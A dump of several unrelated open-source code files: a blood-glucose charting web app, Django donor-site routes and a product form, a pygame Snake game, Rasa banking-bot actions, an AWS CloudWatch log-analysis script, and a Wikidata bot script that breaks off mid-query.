mpl\nmpl.use('Agg')\nimport matplotlib.pyplot as plt\nimport matplotlib.dates as mpd\nimport numpy as np\nfrom datetime import datetime\nfrom General import verify_password, decimalAverage, dateTimeStr, dbFileName\nimport pytz\nfrom io import BytesIO\nfrom pathlib import Path\n# import Sessions, HTTPCookie, System\nimport System\nimport sys\nimport time\n\ndbPath = Path(f'./db/meter.db')\n# dbPath = Path(dbFile)\ndb = Database()\n\nclass Readings(db.Entity):\n readingdate = PrimaryKey(str)\n avgreading = Optional(float)\nDATE = 0\nAVERAGE = 1\n\nclass Comments(db.Entity):\n date = PrimaryKey(str)\n reading = Optional(float)\n comment = Optional(str)\n\n\ndb.bind(provider='sqlite', filename=str(dbPath), create_db=False)\n# db.bind(provider='sqlite', filename=\"db/meter.db\", create_db=False)\ndb.generate_mapping(create_tables=False)\n\n# zulu = pytz.timezone('UTC')\npst = pytz.timezone(\"America/Vancouver\")\n\ndef renderChart(request):\n\n DateCombined = []\n CommentDateCombined = []\n DailyAverageCombined = []\n CommentCombined = []\n CommentReadingCombined = []\n\n dATE = 0\n aVERAGE = 1\n\n with db_session:\n qry = select((r.readingdate, r.avgreading) for r in Readings).order_by(1)\n try:\n recs = qry.fetch()\n except Exception as e:\n print(e)\n for rec in recs:\n dtdate, avg = rec\n dtdate = datetime.strptime(dtdate, \"%Y-%m-%d\")\n DateCombined.append(dtdate)\n DailyAverageCombined.append(avg)\n\n qry = select((c.date, c.reading, c.comment) for c in Comments).order_by(1)\n try:\n recs = qry.fetch()\n except Exception as e:\n print(e)\n for rec in recs:\n dtdate, reading, comment = rec\n dtdate = datetime.strptime(dtdate, \"%Y-%m-%d\")\n CommentDateCombined.append(dtdate)\n CommentReadingCombined.append(reading)\n CommentCombined.append(comment)\n\n DateCombined = mpd.date2num(DateCombined)\n CommentDateCombined = mpd.date2num(CommentDateCombined)\n\n fig, ax1 = plt.subplots()\n\n lineTarg = ax1.axhline(y=6, linewidth=4, color='k', label='Glucose Target Range')\n ax1.axhline(y=9, linewidth=4, color='k')\n\n background = 0.30\n\n lineCombined, = ax1.plot_date(DateCombined, DailyAverageCombined, label='Daily Blood Glucose', linestyle='-',\n linewidth=1, color='r', marker=None, tz=pst) #\n\n ax1.yaxis.grid(True, linewidth=1)\n\n for i in range(len(CommentDateCombined)):\n # text = f'<---{(CommentCombined[i], CommentDateCombined[i])}'\n text = f'<---{CommentCombined[i]}'\n # return pprint.pformat((text, CommentDateCombined[i], CommentAverageCombined[i]))\n ax1.annotate(text, 
(CommentDateCombined[i], CommentReadingCombined[i]), fontsize=14,\n color='b', weight='bold') # , rotation=0,\n#-------------------------\n DateRange = np.concatenate((DateCombined,))\n minDate = min(DateRange)\n maxDate = max(DateRange)\n ax1.set_xlim(minDate, maxDate)\n\n df = mpl.dates.DateFormatter('%b-%d', tz=pst)\n ax1.xaxis.set_major_formatter(df)\n ax1.tick_params(which='major', width=2.0, length=4.0) # , labelsize=10)\n xlocator = mpl.dates.DayLocator(tz=pst)\n ax1.xaxis.set_minor_locator(xlocator)\n\n plt.gcf().autofmt_xdate()\n\n z = np.polyfit(DateCombined, DailyAverageCombined, 2)\n # z = np.polynomial.chebyshev.chebfit(DateCombined, DailyAverageCombined, 2)\n p = np.poly1d(z)\n trendLine, = ax1.plot_date(DateCombined, p(DateCombined), 'k--', label='Trend Line')\n\n # ax1.legend(handles=[lineCombined, trendLine, lineTarg], loc='upper left') # , loc='lower right' 'best'\n ax1.legend(handles=[lineCombined, lineTarg, trendLine], loc='upper right') # , loc='lower right' 'best'\n\n plt.title('Average Daily Blood Glucose (Jardiance Trial)', loc='left')\n plt.title('William Trenker')\n #\n # sessionID = HTTPCookie.getSessionCookie(request)\n nowstr = System.getLastReadingDateStr()\n # nowstr = dateTimeStr(datetime.now(), \"America/Vancouver\")\n dbNow = f'({dbFileName}) last updated: {nowstr}'\n plt.title(dbNow, fontsize=10, loc='right')\n #\n ax1.set_xlabel('Date (2019 - 2020)') # Note that this won't work on plt or ax2\n ax1.set_ylabel('Blood Glucose (mmol/L)')\n\n fig.set_size_inches(16, 8.5)\n # fig.tight_layout()\n\n img = BytesIO()\n fig.savefig(img)\n img.seek(0)\n return img\n # return send_file(img, mimetype='image/png')\n\n@get('/', name='home')\n@get('/home', name=\"homepage\")\ndef home():\n respData = MultiDict(url=url, title='Blood Glucose')\n return jinja2_template('Home.jinja2', respData, template_lookup=['templates'])\n\n@get('/averages', name=\"averages\")\ndef averages():\n # sessionID = HTTPCookie.getSessionCookie(request)\n respData = dict(url=url, title='Blood Glucose', timestamp=time.time()) #, sessionID=sessionID)\n return jinja2_template('Averages.jinja2', respData, template_lookup=['templates'])\n\n@get('/chart', name='chart')\ndef chart():\n # log('chart', 'HTTPResponse')\n img = renderChart(request)\n resp = HTTPResponse(body=img, status=200)\n resp.set_header('content_type', 'image/png')\n return resp\n\napp = default_app()\n\n@app.error(404)\ndef error404handler(error):\n f = request.fullpath\n respData = MultiDict(dict(f=f))\n return jinja2_template('405.jinja2', respData, template_lookup=['templates'])\n\n@app.error(405)\ndef error405handler(error):\n f = request.fullpath\n respData = MultiDict(dict(f=f))\n return jinja2_template('405.jinja2', respData, template_lookup=['templates'])\n\n@app.error(500)\ndef error500handler(error):\n f = request.fullpath\n respData = MultiDict(dict(f=f))\n return jinja2_template('500.jinja2', template_lookup=['templates'])\n\n\n\nif __name__ == '__main__':\n run(host='localhost', port=8081, debug=True)\n# renderChart(request)\n","repo_name":"wtrenker/glucose-chart","sub_path":"ChartMeter.py","file_name":"ChartMeter.py","file_ext":"py","file_size_in_byte":6180,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"40476452722","text":"from django.urls import path\nfrom django.contrib.auth.views import LoginView\nfrom . 
import views\n\nurlpatterns = [\n    #index Page View\n    path('', views.index, name='index'),\n    #Login Page View\n    path('donorlogin/', LoginView.as_view(template_name='pages-login.html'),name='pages-login'),\n    #SignUp Page View\n    path('donorsignup/', views.donor_signup_view,name='pages-register'),\n    #Donation History Page View\n    path('donation-history/', views.donation_history_view,name='donation-history'),\n    #Questionnaire Page View\n    path('questionnaire/', views.questionnare_view,name='questionnaire'),\n    #Questionnaire Fail Page View\n    path('questionnairefail/', views.questionnairefail_view,name='questionnairefail'),\n    #Users Profile Page View\n    path('users-profile/', views.users_profile,name='users-profile'),\n    #Updating Profile Page View\n    path('updateProfile/', views.updateProfile, name=\"updateData\"),\n    #Booking Appointment Page View\n    path('donor_bookappt/', views.donor_bookappt,name='donor_bookappt'),\n    #Needs Questionnaire View Page View\n    path('donor_bookappNoQ/', views.donor_bookappNoQ,name='donor_bookappNoQ'),\n    #Current Appointment Page View\n    path('donor_currentappt//', views.donor_currentappt, name=\"donor_currentappt\"),\n    #Current appointment Page Page View\n    path('donor_currentappt/', views.donor_currentappt_specific, name=\"bookAppt\"),\n    #Cancelling Appointment Page View\n    path('donor_delete_currentappt//', views.donor_delete_currentappt, name=\"donor_delete_currentappt\"),\n]\n","repo_name":"HamzaElshakankiri/LifeSourceBloodBankWebsite","sub_path":"donor/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1641,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"20790742376","text":"import pygame\r\nimport random\r\n\r\n# Initialize Pygame\r\npygame.init()\r\n\r\n# Define the screen size and the block size\r\nSCREEN_WIDTH = 600\r\nSCREEN_HEIGHT = 600\r\nBLOCK_SIZE = 10\r\n\r\n# Create the window\r\nscreen = pygame.display.set_mode((SCREEN_WIDTH, SCREEN_HEIGHT))\r\npygame.display.set_caption(\"Snake\")\r\n\r\n# Define the colors\r\nBLACK = (0, 0, 0)\r\nWHITE = (255, 255, 255)\r\nRED = (255, 0, 0)\r\n\r\n# Define the functions\r\ndef draw_block(color, row, column):\r\n    \"\"\"Draw a block on the screen\"\"\"\r\n    pygame.draw.rect(screen, color, [column * BLOCK_SIZE, row * BLOCK_SIZE, BLOCK_SIZE, BLOCK_SIZE])\r\n\r\ndef generate_food():\r\n    \"\"\"Generate food for the snake at a random position\"\"\"\r\n    food_row = random.randint(0, (SCREEN_HEIGHT // BLOCK_SIZE) - 1)\r\n    food_column = random.randint(0, (SCREEN_WIDTH // BLOCK_SIZE) - 1)\r\n    return food_row, food_column\r\n\r\n# Initialize the variables\r\ngame_over = False\r\nclock = pygame.time.Clock()\r\n\r\n# Create the snake as a list of [row, column] segments, head first\r\nsnake = [[(SCREEN_HEIGHT // BLOCK_SIZE) // 2, (SCREEN_WIDTH // BLOCK_SIZE) // 2]]\r\nsnake_direction = \"right\"\r\n\r\n# Create the food\r\nfood_row, food_column = generate_food()\r\n\r\n# Main game loop\r\nwhile not game_over:\r\n    # Handle events\r\n    for event in pygame.event.get():\r\n        if event.type == pygame.QUIT:\r\n            game_over = True\r\n        elif event.type == pygame.KEYDOWN:\r\n            if event.key == pygame.K_LEFT:\r\n                snake_direction = \"left\"\r\n            elif event.key == pygame.K_RIGHT:\r\n                snake_direction = \"right\"\r\n            elif event.key == pygame.K_UP:\r\n                snake_direction = \"up\"\r\n            elif event.key == pygame.K_DOWN:\r\n                snake_direction = \"down\"\r\n    \r\n    # Move the snake: compute the new head position\r\n    head = list(snake[0])\r\n    if snake_direction == \"left\":\r\n        head[1] -= 1\r\n    elif snake_direction == \"right\":\r\n        head[1] += 1\r\n    elif snake_direction == \"up\":\r\n        head[0] -= 1\r\n    elif snake_direction == 
\"down\":\r\n        head[0] += 1\r\n    \r\n    # Check for collision with the walls\r\n    if head[0] < 0 or head[0] >= SCREEN_HEIGHT // BLOCK_SIZE or head[1] < 0 or head[1] >= SCREEN_WIDTH // BLOCK_SIZE:\r\n        game_over = True\r\n    \r\n    # Check for collision with the snake's body\r\n    for block in snake:\r\n        if head[0] == block[0] and head[1] == block[1]:\r\n            game_over = True\r\n    \r\n    snake.insert(0, head)\r\n    \r\n    # Check whether the food was eaten; if so, grow by keeping the tail\r\n    if head[0] == food_row and head[1] == food_column:\r\n        food_row, food_column = generate_food()\r\n    else:\r\n        snake.pop()\r\n    \r\n    # Draw the background\r\n    screen.fill(BLACK)\r\n    \r\n    # Draw the food and the snake\r\n    draw_block(RED, food_row, food_column)\r\n    for row, column in snake:\r\n        draw_block(WHITE, row, column)\r\n    \r\n    pygame.display.update()\r\n    clock.tick(10)\r\n","repo_name":"LazarevaViktoriya/python_vika","sub_path":"main (12).py","file_name":"main (12).py","file_ext":"py","file_size_in_byte":2935,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"5931227932","text":"from django import forms\nfrom .models import Product\n\n\nclass ProductForm(forms.ModelForm):\n    image = forms.ImageField(\n        required=False,\n        widget=forms.ClearableFileInput(attrs={\n            'multiple': True,\n        })\n    )\n\n    field_order = [\n        'category',\n        'name',\n        'product_code',\n        'make',\n        'model',\n        'discount_code',\n        'manufacturer',\n        'price_incl_vat',\n        'fitting_cost',\n        'description',\n        'image',\n    ]\n\n    class Meta:\n        model = Product\n        fields = [\n            'category',\n            'name',\n            'product_code',\n            'make',\n            'model',\n            'discount_code',\n            'manufacturer',\n            'price_incl_vat',\n            'description',\n            'fitting_cost',\n        ]\n\n    def __init__(self, *args, **kwargs):\n        super().__init__(*args, **kwargs)\n\n        placeholders = {\n            'category': 'Category',\n            'name': 'Name',\n            'product_code': 'Product Code',\n            'make': 'Vehicle Make',\n            'model': 'Vehicle Model',\n            'manufacturer': 'Item Manufacturer',\n            'price_incl_vat': 'Price (incl vat)',\n            'description': 'Item Description',\n            'fitting_cost': 'Installation Cost',\n            'image': 'Image',\n            'discount_code': 'Discount Code',\n        }\n\n        labels = {\n            'category': 'Shop Category',\n            'image': 'Images',\n            'add_attributes': 'Add Attributes',\n            'discount_code': 'Available Discount Codes',\n        }\n\n        for field in self.fields:\n            if field != 'price_incl_vat' and field != 'fitting_cost':\n                self.fields[field].widget.attrs['class'] = 'form-control mb-1'\n            elif field == 'price_incl_vat' or field == 'fitting_cost':\n                self.fields[field].widget.attrs['class'] = 'form-control mb-1 mw-200'\n            if field != 'category' and field != 'image' and field != \\\n                    'discount_code':\n                self.fields[field].label = False\n                placeholder = placeholders[field]\n                self.fields[field].widget.attrs['placeholder'] = placeholder\n            if field == 'category' or field == 'image' or field == \\\n                    'discount_code':\n                label = labels[field]\n                self.fields[field].label = label\n","repo_name":"Matte-gtr/AngliaPerformanceCentre","sub_path":"shop/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":2426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"28120349379","text":"from typing import Any, Dict, List, Text\nfrom rasa_sdk import Tracker\nfrom rasa_sdk.events import SlotSet\nfrom rasa_sdk.executor import CollectingDispatcher\nfrom rasa_sdk.types import DomainDict\nimport queries_location\nfrom actions.base_classes import BaseFormValidationAction, BaseSubmitAction\n\n\nclass ValidateOutstandingAmountForm(BaseFormValidationAction):\n    def name(self) -> Text:\n        return \"validate_outstanding_amount_form\"\n\n    async def validate_outstanding_amount_payment_slot(\n        self,\n        
slot_value: Any,\n dispatcher: CollectingDispatcher,\n tracker: Tracker,\n domain: DomainDict,\n ) -> Dict[Text, Any]:\n card_number = tracker.get_slot(\"extracted_card_number_slot\")\n balance = queries_location.get_balance_query_by_card_number(\n card_number)\n outstanding_amount = queries_location.get_outstanding_amount_query_by_card_number(\n card_number)\n\n payment_amount = int(slot_value)\n\n if balance < payment_amount:\n dispatcher.utter_message(\"You don't have enough funds to make this payment.\")\n return {\"outstanding_amount_payment_slot\": None}\n elif outstanding_amount < payment_amount:\n dispatcher.utter_message(\"You can't pay more than the outstanding amount.\")\n return {\"outstanding_amount_payment_slot\": None}\n else:\n return {\"outstanding_amount_payment_slot\": payment_amount}\n\n\nclass ActionSubmitOutstandingAmountForm(BaseSubmitAction):\n def name(self) -> Text:\n return \"submit_outstanding_amount_form\"\n\n async def submit(\n self,\n dispatcher: CollectingDispatcher,\n tracker: Tracker,\n domain: Dict[Text, Any],\n ) -> List[Dict[Text, Any]]:\n card_number = tracker.get_slot('extracted_card_number_slot')\n payment_amount = tracker.get_slot('outstanding_amount_payment_slot')\n\n queries_location.pay_outstanding_amount_query_by_card_number(card_number,\n payment_amount)\n\n dispatcher.utter_message(\"Payment successful!\")\n\n return [SlotSet('outstanding_amount_payment_slot', None)]\n","repo_name":"Ssyba/RasaBankBot","sub_path":"actions/action_outstanding_amount_form.py","file_name":"action_outstanding_amount_form.py","file_ext":"py","file_size_in_byte":2231,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"70086437605","text":"import os\nimport sys\nimport logging\nimport concurrent.futures\nimport pandas\nimport csv\nfrom aws_get_log_events import get_log_events\nimport time\n\nlogging.basicConfig(level=logging.INFO)\n\ncurrent_milli_time = lambda: int(round(time.time() * 1000))\nLOG_GROUP=\"spaceadapter-prod\"\n\n\nclass LogFilter(object):\n def __init__(self, name, filter, location_column_nr=None, second_value_column=None, regex=\"\"):\n self.name = name\n self.filter = filter\n self.location_column_nr = location_column_nr\n self.second_value_column = second_value_column\n self.filename = None\n self.filename_csv = None\n self.regex = regex\n self.pdseries = None\n\n def __str__(self):\n return self.name\n\n def concatenate_files(self, input_files, output_file):\n logging.debug(f\"concatenate_files(): input_files: {input_files}, output_file: '{output_file}'\")\n with open(output_file, 'w') as outfile:\n for fname in input_files:\n with open(fname) as infile:\n for line in infile:\n outfile.write(line)\n\n def convert_txt_to_csv(self, input_file, output_file):\n logging.debug(f\"convert_txt_to_csv(): input_file: {input_file}, output_file: '{output_file}'\")\n with open(input_file, 'r') as in_file:\n stripped = (line.strip() for line in in_file)\n lines = (line.replace(\",\", \"\").split(\" \") for line in stripped if line)\n with open(output_file, 'w') as out_file:\n writer = csv.writer(out_file)\n writer.writerows(lines)\n\n\n def get_filtered_logs(self, start_log_streams_number, end_log_streams_number, day):\n logging.debug(f\"get_filtered_logs(): key: {self.name}, filter: '{self.filter}'\")\n\n #cur_time = current_milli_time()\n filename_prefix = f\"{self.name}-\"\n if day == None:\n logs = get_log_events(\n log_group=LOG_GROUP,\n start_log_streams_number=start_log_streams_number,\n 
end_log_streams_number=end_log_streams_number,\n filter=self.filter,\n filename_prefix=filename_prefix,\n regex=self.regex,\n )\n else:\n start_time = day + \" 00:00:00\"\n end_time = day + \" 23:59:59\"\n logs = get_log_events(\n log_group=LOG_GROUP,\n start_time=start_time,\n end_time=end_time,\n filter=self.filter,\n filename_prefix=filename_prefix,\n regex=self.regex,\n )\n\n #convert file to csv\n self.filename = f\"/tmp/{self.name}\"\n self.concatenate_files(logs, self.filename)\n\n self.filename_csv = f\"{self.filename}.csv\"\n self.convert_txt_to_csv(self.filename, self.filename_csv)\n\n return self\n\n def process_csv(self):\n self._get_aggregated_stats()\n\n def _get_aggregated_stats(self):\n if self.location_column_nr and self.second_value_column:\n data = pandas.read_csv(self.filename_csv, \n header=None, \n usecols=[self.location_column_nr, self.second_value_column],\n names=['location', 'status'],\n dtype={'location':'int32','status':'str'},\n )\n self.pdseries = data\n column_name = self.name.replace(f\"{LOG_GROUP}-\", \"\")\n if column_name == f\"nr-of-items-per-store\":\n self.pdseries.columns = ['location', column_name]\n self.pdseries['status'] = \"200\"\n self.pdseries[column_name] = self.pdseries[column_name].apply(lambda x: x.split(\"/\")[1])\n self.pdseries = data.groupby(['location', 'status']).nth(0)\n #print(self.pdseries)\n else:\n #print(f\"file: {self.filename}; filter: '{self.filter}'\")\n self.pdseries = data.groupby(['location', 'status']).size()\n self.pdseries = self.pdseries.rename(column_name)\n #print(self.pdseries)\n else:\n with open(self.filename, \"r\") as file:\n print(file.read())\n\n\n\n #destructor\n #def __del__(self):\n #logging.debug(f\"cleaning files: {self.filename} and {self.filename_csv}\")\n #for file in [self.filename, self.filename_csv]:\n #if file and os.path.exists(file):\n #os.remove(file)\n\nfilters = [\n LogFilter(\n name=f\"{LOG_GROUP}-process-times\",\n filter=\"END FUNCTIONALITY\"\n ),\n LogFilter(\n name=f\"{LOG_GROUP}-nr-of-items-per-store\",\n filter=\"items progress 1\",\n regex=\".*items progress\\: 1\\/.*\",\n location_column_nr=9,\n second_value_column=18\n ),\n LogFilter(\n name=f\"{LOG_GROUP}-putProductPlacements\", \n filter=\"put To ProductPlacement response location status\",\n location_column_nr=13,\n second_value_column=17,\n ),\n LogFilter(\n name=f\"{LOG_GROUP}-getProductPlacements\",\n filter=\"OSP get product placement location status\",\n location_column_nr=11,\n second_value_column=16,\n ),\n LogFilter(\n name=f\"{LOG_GROUP}-getSpaceLocations\",\n filter=\"callGetSpaceAPI location status\",\n location_column_nr=12,\n second_value_column=16,\n ),\n LogFilter(\n name=f\"{LOG_GROUP}-putSiteRange\",\n filter=\"putToSiteRange retailerSiteId status\",\n location_column_nr=12,\n second_value_column=14,\n ),\n]\n\nif __name__ == \"__main__\": \n \n if (len(sys.argv) != 2 and len(sys.argv) != 3):\n print(\"ERROR: wrong arguments\")\n print(\"Usage: space-range-adapter-log-analysis.sh NUMBER_OF_LOG_STREAMS\")\n print(\"Usage: space-range-adapter-log-analysis.sh 8\")\n print(\"Usage: space-range-adapter-log-analysis.sh 8-16\")\n print(\"Usage: space-range-adapter-log-analysis.sh --day '2020-05-11'\")\n sys.exit(1)\n\n day = None\n start_log_streams_number = 1\n end_log_streams_number = 2\n if (len(sys.argv) == 3 and sys.argv[1] == \"--day\"):\n day = sys.argv[2]\n else:\n log_streams_number = sys.argv[1]\n if len(log_streams_number.split(\"-\")) == 2:\n start_log_streams_number = 
int(log_streams_number.split(\"-\")[0])\n end_log_streams_number = int(log_streams_number.split(\"-\")[1])\n else:\n end_log_streams_number = int(log_streams_number)\n\n\n results = []\n with concurrent.futures.ThreadPoolExecutor(max_workers=2) as executor:\n try:\n stream_futures = {executor.submit(filter.get_filtered_logs, start_log_streams_number, end_log_streams_number, day): filter for filter in filters}\n except Exception as ex:\n logging.error(f\"exception: {ex}\")\n\n for future in concurrent.futures.as_completed(stream_futures):\n stream = stream_futures[future]\n filter = future.result()\n logging.debug(f\"finished getting logs from stream: {filter}\")\n filter.process_csv()\n results.append(filter)\n\n final_dataframe = None\n for filter in filters:\n if filter.pdseries is not None:\n if final_dataframe is None:\n final_dataframe = filter.pdseries\n else:\n final_dataframe = pandas.merge(final_dataframe, filter.pdseries, on=[\"location\", \"status\"], how=\"outer\")\n\n print(\"==================================================\")\n final_dataframe = final_dataframe.fillna(0)\n final_dataframe = final_dataframe.astype(\"int32\")\n final_dataframe = final_dataframe.sort_values(['location', 'status'])\n final_dataframe.loc['Total'] = final_dataframe.sum(numeric_only=True, axis=0)\n #list_name= [\"putProductPlacements\",\"getProductPlacements\", \"getSpaceLocations\",\"putSiteRange\"]\n #final_dataframe['total']=final_dataframe.loc[:,list_name].sum(axis=1)\n final_dataframe.to_csv(\"/tmp/space-range-adapter-analysis.csv\")\n print(final_dataframe.to_string())\n\n","repo_name":"DamZiobro/coding_playground","sub_path":"aws/cloudwatch/space-range-adapter-log-analysis.py","file_name":"space-range-adapter-log-analysis.py","file_ext":"py","file_size_in_byte":8183,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"52"} +{"seq_id":"72877986725","text":"from project.animal import Animal\nfrom project.worker import Worker\n\n\nclass Zoo:\n def __init__(self, name, budget, animal_capacity, workers_capacity):\n self.name = name\n self.__budget = budget\n self.__animal_capacity = animal_capacity\n self.__worker_capacity = workers_capacity\n self.animals = []\n self.workers = []\n\n \n def add_animal(self, animal: Animal, price):\n if self.__budget - price < 0:\n return \"Not enough budget\"\n\n if self.__animal_capacity == len(self.animals):\n return \"Not enough space for animal\"\n\n self.animals.append(animal)\n\n self.__budget -= price\n\n return f\"{animal.name} the {animal.__class__.__name__} added to the zoo\"\n\n\n def hire_worker(self, worker: Worker):\n if self.__worker_capacity == len(self.workers):\n return \"Not enough space for worker\"\n\n self.workers.append(worker) \n\n return f\"{worker.name} the {worker.__class__.__name__} hired successfully\"\n\n\n def fire_worker(self, worker_name):\n try:\n worker = next(filter(lambda w: w.name == worker_name, self.workers))\n except StopIteration:\n return f\"There is no {worker_name} in the zoo\"\n\n self.workers.remove(worker)\n\n return f\"{worker_name} fired successfully\"\n\n\n def pay_workers(self):\n salaries = sum([w.salary for w in self.workers])\n\n if self.__budget - salaries < 0:\n return \"You have no budget to pay your workers. They are unhappy\"\n\n self.__budget -= salaries\n\n return f\"You payed your workers. They are happy. 
Budget left: {self.__budget}\"\n\n\n    def tend_animals(self):\n        animal_cost = sum([a.money_for_care for a in self.animals])\n\n        if self.__budget - animal_cost < 0:\n            return \"You have no budget to tend the animals. They are unhappy.\"\n\n        self.__budget -= animal_cost\n\n        return f\"You tended all the animals. They are happy. Budget left: {self.__budget}\"\n\n\n    def profit(self, amount):\n        self.__budget += amount\n\n\n    def animals_status(self):\n        lions = list(filter(lambda a: a.__class__.__name__ == \"Lion\", self.animals))\n        tigars = list(filter(lambda a: a.__class__.__name__ == \"Tiger\", self.animals))\n        cheetahs = list(filter(lambda a: a.__class__.__name__ == \"Cheetah\", self.animals))\n        \n        result = [f\"You have {len(self.animals)} animals\",\n                  f\"----- {len(lions)} Lions:\"\n                  ]\n\n        result.extend(lions)\n\n        result.append(f\"----- {len(tigars)} Tigers:\")\n        result.extend(tigars)\n\n        result.append(f\"----- {len(cheetahs)} Cheetahs:\")\n        result.extend(cheetahs)\n\n        return \"\\n\".join(str(r) for r in result)\n\n\n    def workers_status(self):\n        keepers = list(filter(lambda w: w.__class__.__name__ == \"Keeper\", self.workers))\n        caretakers = list(filter(lambda w: w.__class__.__name__ == \"Caretaker\", self.workers))\n        vets = list(filter(lambda w: w.__class__.__name__ == \"Vet\", self.workers))\n        \n        result = [f\"You have {len(self.workers)} workers\",\n                  f\"----- {len(keepers)} Keepers:\"\n                  ]\n\n        result.extend(keepers)\n\n        result.append(f\"----- {len(caretakers)} Caretakers:\")\n        result.extend(caretakers)\n\n        result.append(f\"----- {len(vets)} Vets:\")\n        result.extend(vets)\n\n        return \"\\n\".join(str(r) for r in result)\n\n\n\n","repo_name":"Gibinski/SoftUni-training","sub_path":"Python OOP/4. Encapsulation/Exercise/01. Wild Cat Zoo/zoo.py","file_name":"zoo.py","file_ext":"py","file_size_in_byte":3433,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"22049057128","text":"\"\"\"\n\npython ./scripts/add_ca_label_description.py --log logs/add_ca_label_description.log\n\npython scripts/add_ca_label_description.py | tee log/20190108.log\npython scripts/add_ca_label_description.py | tee log/20190108-tmp.log\n%run scripts/add_ca_label_description.py\n\"\"\"\n#\n# import sys\n# # sys.setdefaultencoding() does not exist, here!\n# reload(sys) # Reload does the trick!\n# sys.setdefaultencoding('UTF8')\nimport argparse\nimport copy\nimport datetime\nimport logging\n\nfrom pywikibot import pagegenerators as pg\nfrom pywikibot.exceptions import OtherPageSaveError\n\nimport wikidatabot\nfrom wikidatabot.models import Item\n\n\nlogger = logging.getLogger('add_ca_label_description')\n\n\nINSTANCE_OF = 'P31'\nCOMMUNE_NOUVELLE = 'Q2989454'\nSTART_TIME = 'P580'\nEND_TIME = 'P582'\n\nREPLACES = 'P1365'\n\nLOCATED_IN = 'P131'\nDEPARTMENT_OF_FRANCE = 'Q6465'\nTNCC = {\n    'Ain': 5, 'Aisne': 5, 'Allier': 5, 'Alpes-de-Haute-Provence': 4, 'Hautes-Alpes': 4, 'Alpes-Maritimes': 4,\n    'Ardèche': 5, 'Ardennes': 4, 'Ariège': 5, 'Aube': 5, 'Aude': 5, 'Aveyron': 5, 'Bouches-du-Rhône': 4, 'Calvados': 2,\n    'Cantal': 2, 'Charente': 3, 'Charente-Maritime': 3, 'Cher': 2, 'Corrèze': 3, \"Côte-d'Or\": 3, \"Côtes-d'Armor\": 4,\n    'Creuse': 3, 'Dordogne': 3, 'Doubs': 2, 'Drôme': 3, 'Eure': 5, 'Eure-et-Loir': 1, 'Finistère': 2, 'Corse-du-Sud': 3,\n    'Haute-Corse': 3, 'Gard': 2, 'Haute-Garonne': 3, 'Gers': 2, 'Gironde': 3, 'Hérault': 5, 'Ille-et-Vilaine': 1,\n    'Indre': 5, 'Indre-et-Loire': 1, 'Isère': 5, 'Jura': 2, 'Landes': 4, 'Loir-et-Cher': 2, 'Loire': 3,\n    'Haute-Loire': 3, 
'Loire-Atlantique': 3, 'Loiret': 2, 'Lot': 2, 'Lot-et-Garonne': 2, 'Lozère': 3,\n 'Maine-et-Loire': 2, 'Manche': 3, 'Marne': 3, 'Haute-Marne': 3, 'Mayenne': 3, 'Meurthe-et-Moselle': 0, 'Meuse': 3,\n 'Morbihan': 2, 'Moselle': 3, 'Nièvre': 3, 'Nord': 2, 'Oise': 5, 'Orne': 5, 'Pas-de-Calais': 2, 'Puy-de-Dôme': 2,\n 'Pyrénées-Atlantiques': 4, 'Hautes-Pyrénées': 4, 'Pyrénées-Orientales': 4, 'Bas-Rhin': 2, 'Haut-Rhin': 2,\n 'Rhône': 2, 'Haute-Saône': 3, 'Saône-et-Loire': 0, 'Sarthe': 3, 'Savoie': 3, 'Haute-Savoie': 3, 'Paris': 0,\n 'Seine-Maritime': 3, 'Seine-et-Marne': 0, 'Yvelines': 4, 'Deux-Sèvres': 4, 'Somme': 3, 'Tarn': 2,\n 'Tarn-et-Garonne': 2, 'Var': 2, 'Vaucluse': 2, 'Vendée': 3, 'Vienne': 3, 'Haute-Vienne': 3, 'Vosges': 4, 'Yonne': 5,\n 'Territoire de Belfort': 2, 'Essonne': 5, 'Hauts-de-Seine': 4, 'Seine-Saint-Denis': 3, 'Val-de-Marne': 2,\n \"Val-d'Oise\": 2, 'Guadeloupe': 3, 'Martinique': 3, 'Guyane': 3, 'La Réunion': 0, 'Mayotte': 0}\nTNCC_CA = {**TNCC, **{\n 'Ardennes': 7, 'Bouches-du-Rhône': 7, 'Calvados': 0, 'Cantal': 0, 'Charente': 2, 'Charente-Maritime': 2,\n \"Côtes-d'Armor\": 7, 'Finistère': 0, 'Corse-du-Sud': 0, 'Haute-Corse': 5, 'Haute-Garonne': 5, 'Isère': 3,\n 'Landes': 7, 'Loir-et-Cher': 0, 'Loire': 2, 'Haute-Loire': 5, 'Loire-Atlantique': 2, 'Lot': 5, 'Lot-et-Garonne': 1,\n 'Lozère': 2, 'Maine-et-Loire': 0, 'Marne': 2, 'Haute-Marne': 5, 'Mayenne': 2, 'Meuse': 2, 'Morbihan': 1,\n 'Moselle': 2, 'Nièvre': 2, 'Haut-Rhin': 5, 'Haute-Saône': 5, 'Sarthe': 2, 'Haute-Savoie': 5, 'Seine-Maritime': 2,\n 'Yvelines': 1, 'Deux-Sèvres': 0, 'Somme': 2, 'Tarn-et-Garonne': 0, 'Vaucluse': 0, 'Haute-Vienne': 5, 'Yonne': 2,\n 'Seine-Saint-Denis': 0, 'Val-de-Marne': 3, \"Val-d'Oise\": 3, 'Guadeloupe': 0, 'La Réunion': 5,\n}}\n\nDE = {0: \"de \",\n 1: \"d'\",\n 2: \"del \",\n 3: \"de la \",\n 4: \"dels \",\n 5: \"de l'\",\n 6: \"dels \",\n 7: \"de les \",\n 8: \"dels \"}\n\nQUERY = (\"\"\"\nSELECT ?item\nWHERE {\n ?item p:{instance_of} ?statement.\n ?statement ps:{instance_of} wd:{commune_nouvelle};\n pq:{start_time} ?date.\n FILTER (YEAR(?date) >= 2019).\n}\n\"\"\".replace('{instance_of}', INSTANCE_OF)\n .replace('{commune_nouvelle}', COMMUNE_NOUVELLE)\n .replace('{start_time}', 